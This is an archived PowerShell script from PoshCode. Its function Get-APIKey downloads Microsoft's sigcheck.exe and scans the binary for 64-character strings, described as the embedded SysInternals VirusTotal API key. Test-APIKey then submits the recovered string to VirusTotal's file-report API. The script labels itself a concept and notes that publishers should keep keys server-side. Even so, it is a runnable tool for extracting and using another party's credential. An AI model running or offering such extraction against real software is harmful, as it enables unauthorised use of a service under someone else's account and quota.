PoshCode Archive  Artifact [74c491e9cc]

Artifact 74c491e9cc8babfc2fbb594279948af79455fbb102833b658098f5b45cb369aa:

  • File sysinternals-VT-key.ps1 — part of check-in [79a84b0773] at 2018-06-10 14:02:22 on branch trunk — Actually, this is not my script (you can find the original post at https://github.com/gregzakharov/ps/blob/master/ps4/Get-SIVTAPIKey.ps1). It really works! (user: greg zakharov size: 1600)

# encoding: ascii
# api: powershell
# title: sysinternals VT key
# description: Actually, this is not my script (you can find the original post at https://github.com/gregzakharov/ps/blob/master/ps4/Get-SIVTAPIKey.ps1). It really works!
# version: 0.1
# type: function
# author: greg zakharov
# license: CC0
# function: Get-APIKey
# x-poshcode-id: 5835
# x-archived: 2015-04-29T12:27:20
# x-published: 2015-04-26T18:51:00
#
#
#requires -version 4
function Get-APIKey {
  <#
    .SYNOPSIS
        Lists 64-character alphanumeric strings embedded in the published
        sigcheck.exe (per the original author, the SysInternals VirusTotal key).
    .DESCRIPTION
        DO NOT USE IT FOR YOUR DIRTY PURPOSES! THIS SCRIPT IS JUST A CONCEPT.

        Downloads sigcheck.exe from live.sysinternals.com, decodes the response
        body to text, collects every run of 64 or more printable ASCII
        characters, and emits the runs that consist of exactly 64 digits or
        letters. Zero, one or several strings can come back; nothing here
        checks that a returned string is actually a key.
    .PARAMETER UserAgent
        Optional User-Agent header value for the download. Accepted from the
        pipeline; when omitted the web cmdlet's default is used.
    .OUTPUTS
        System.String - one per matching run.
    .NOTES
        Author: greg zakharov

        What the concept shows: a credential compiled into a distributed
        binary can be recovered with a plain printable-string scan, so the
        fix belongs on the publisher side (keep the key behind a server-side
        proxy, or issue per-user keys that can be rotated).
  #>
  param(
    [Parameter(ValueFromPipeline=$true)]
    [ValidateNotNullOrEmpty()]
    [String]$UserAgent
  )

  # Splatted arguments for the download request.
  $request = @{
    Uri = 'https://live.sysinternals.com/sigcheck.exe'
    DisableKeepAlive = $true
    UseBasicParsing = $true
  }
  if ($UserAgent) { $request['UserAgent'] = $UserAgent }

  # 'wget' is the built-in alias for Invoke-WebRequest in Windows PowerShell.
  $response = wget @request

  # NOTE(review): UTF7 is an unusual choice for turning raw bytes into text;
  # a single-byte encoding would be the conventional pick - confirm intent.
  $text = [Text.Encoding]::UTF7.GetString($response.Content)

  # First pass: runs of at least 64 printable ASCII characters.
  foreach ($run in [Regex]::Matches($text, '[\x20-\x7E]{64,}')) {
    # Second pass: keep runs that are exactly 64 digits/letters.
    # -match is case-insensitive, so upper-case letters pass as well.
    if ($run.Value -match '\A(\d|[a-z]){64}\Z') { $run.Value }
  }
}

function Test-APIKey {
  <#
    .SYNOPSIS
        Tests uncovered public key.
    .DESCRIPTION
        Requests a VirusTotal v2 file report for one fixed resource
        identifier, passing whatever Get-APIKey returns as the 'apikey' form
        field, and returns the object Invoke-RestMethod produces.

        Get-APIKey's output is used as-is: if it yields nothing the field is
        empty, and if it yields several strings the field receives all of
        them. No check is made before the request is sent.
    .NOTES
        Author: greg zakharov

        The resource value is a 64-character hex string (presumably a
        SHA-256 file hash - confirm).
  #>
  # Form fields for the POST body; Get-APIKey runs here and triggers the
  # download of sigcheck.exe.
  $form = @{
    resource = '0EBD8EA9B29BBA099699ED5A81D6BC4CD7FA46DC220D18FA5289BC3EA5EC1AF8'
    apikey = Get-APIKey
  }

  Invoke-RestMethod -Uri 'https://www.virustotal.com/vtapi/v2/file/report' `
                    -Method 'POST' `
                    -Body $form `
                    -DisableKeepAlive
}